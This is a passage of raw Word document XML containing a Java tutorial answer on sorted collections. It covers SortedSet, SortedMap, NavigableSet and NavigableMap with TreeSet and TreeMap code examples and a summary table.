          <v:rect id="_x0000_i1577" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE0D8F" w14:textId="77777777" w:rsidR="000217FF" w:rsidRPr="00CE4B95" w:rsidRDefault="000217FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc196307666"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain sorted collections in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w14:paraId="1EC0A34A" w14:textId="0C1B39B8" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are collections that maintain the elements in a sorted order based on either their natural ordering or a custom comparator that defines the sorting order. These collections are typically part of the Java Collections Framework and implement certain interfaces or classes that enforce sorting behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4517C3"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s an explanation of the key sorted collections in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD716C" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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SortedSet Interface (e.g., TreeSet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5376B"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ortedSet is a subtype of the Set interface that ensures the elements in the collection are sorted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BCF06" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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reeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the most common implementation of SortedSet. It automatically arranges elements in ascending order (based on their natural ordering) or according to a comparator provided at the time of instantiation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291FA23" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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atural Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For elements that implement the Comparable interface, such as Integer, String, etc., the TreeSet will sort them in their natural order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535EC35" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ustom Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you want to define a custom sorting order, you can pass a Comparator to the TreeSet constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B35869"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0B53A5F7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312A4D6" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4A70BF"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ortedSetExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD42268"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2438D383"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ortedSet&lt;Integer&gt; set = new TreeSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317195D"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1834D749"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E33BE79"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621EEF36" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CBE0DA"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orted set: " + set);  // Output: [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DFD29"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365F24C"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90D36BD"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ustom Ordering with Comparator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF99E11"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3531CEDD" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D9C236"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ortedSetCustomOrdering {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC67DD"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1C293F63"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ortedSet&lt;Integer&gt; set = new TreeSet&lt;&gt;(Comparator.reverseOrder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757171FB"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2EB328"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469BBA81"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4ED0CF" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DAD8F41"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orted set (reverse order): " + set);  // Output: [3, 2, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365DACB2"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2B6FAB6"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0BCEDFD" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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SortedMap Interface (e.g., TreeMap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B02BC87"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ortedMap is a subtype of the Map interface that ensures the keys in the map are sorted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63077B08" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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reeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the most common implementation of SortedMap. It stores key-value pairs, where the keys are kept in sorted order. Like TreeSet, TreeMap uses the natural ordering of keys (if they implement Comparable) or a comparator (if provided) to maintain the sorting order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107CE2E" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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atural Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For keys that implement Comparable, the keys will be sorted in their natural order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D803F" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Custom Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can pass a custom Comparator when creating the TreeMap to define the sorting behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ADB9F1"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33C33036"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D6367" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7B53D1"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ortedMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424B33E5"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5A12B028"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ortedMap&lt;String, Integer&gt; map = new TreeMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCD1D0"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Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309E5E4"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Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC520AF"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Orange", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E83D702" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DC1DE6"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orted map: " + map);  // Output: {Apple=1, Banana=2, Orange=3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173E6E9"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66E30EA"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C576AA8"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ustom Ordering with Comparator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A398AF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F252965" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB1EDE6"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ortedMapCustomOrdering {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38003ABD"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7BDA489C"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ortedMap&lt;String, Integer&gt; map = new TreeMap&lt;&gt;(Comparator.reverseOrder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002094B8"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Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5F6AF"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Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03059F5A"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Orange", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEE04B" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAF513F"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orted map (reverse order): " + map);  // Output: {Orange=3, Banana=2, Apple=1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CCD0F8"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67984CB"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EE8639F" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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NavigableSet Interface (e.g., TreeSet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2442989D"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avigableSet is a more specialized interface that extends SortedSet and adds methods for navigating the set, such as retrieving elements that are close to a given element, finding the nearest lower or higher element, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E58E50" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86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reeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since TreeSet implements both SortedSet and NavigableSet, it provides additional methods to navigate through elements, such as lower(), higher(), ceiling(), floor(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66914D48"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6F4EA22A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B00B63" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB19E9F"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NavigableSetExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F0272"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5FAD8A3B"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NavigableSet&lt;Integer&gt; set = new TreeSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CE9D4"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C32F2C"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F59DED"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add(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B85900" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3B2EE9"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Navigable set: " + set);  // Output: [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C839FA6"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Lower than 3: " + set.lower(3));  // Output: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709078A5"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Higher than 2: " + set.higher(2));  // Output: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71714DDF"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2C54EA3"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66688FA" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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NavigableMap Interface (e.g., TreeMap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A1966B"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avigableMap is a more specialized interface that extends SortedMap and adds methods to navigate the map, such as retrieving the nearest lower or higher key, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014582C" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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reeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since TreeMap implements both SortedMap and NavigableMap, it provides methods like lowerKey(), higherKey(), ceilingKey(), floorKey(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47874688"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2BA9B23D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827980B" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12009539"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public class NavigableMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B695A2A"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53B4C869"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NavigableMap&lt;String, Integer&gt; map = new TreeMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5979451A"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Apple", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CD1EF"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Banana", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE8F59"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Orange", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE14C8" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4770397D"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Navigable map: " + map);  // Output: {Apple=1, Banana=2, Orange=3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A3B90"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Lower than 'Banana': " + map.lowerKey("Banana"));  // Output: Apple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABE446"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Higher than 'Banana': " + map.higherKey("Banana"));  // Output: Orange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61068E"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145471C"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9C5C89F" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00990AD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2B54263">
          <v:rect id="_x0000_i1578" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE7898" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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 of Sorted Collec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62"/>
        <w:gridCol w:w="6474"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00990ADD" w:rsidRPr="00CE4B95" w14:paraId="045AA928" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47552A5F" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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llection Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29475F78" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32265A15" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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mplementation Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00990ADD" w:rsidRPr="00CE4B95" w14:paraId="770917B4" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2518089F"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ortedSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="260F923B"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set that maintains elements in sorted order.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E69AC70"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eeSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00990ADD" w:rsidRPr="00CE4B95" w14:paraId="49886739" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32DF5E7C"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ortedMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E388BE5"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map that maintains keys in sorted order.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A5BA9A9"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eeMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00990ADD" w:rsidRPr="00CE4B95" w14:paraId="4486F007" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10ECE3B4"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avigableSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AE83CBE"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tends SortedSet, providing methods to navigate the set and retrieve nearest elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A6F2262"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eeSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00990ADD" w:rsidRPr="00CE4B95" w14:paraId="7023CAF1" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07B32200"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avigableMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E2C0B39"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tends SortedMap, providing methods to navigate the map and retrieve nearest keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AB796DE"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eeMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="282D68FA" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990AD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Use Cases for Sorted Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121082C" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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reeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you need a set of unique elements that are automatically sorted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B437985" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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reeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
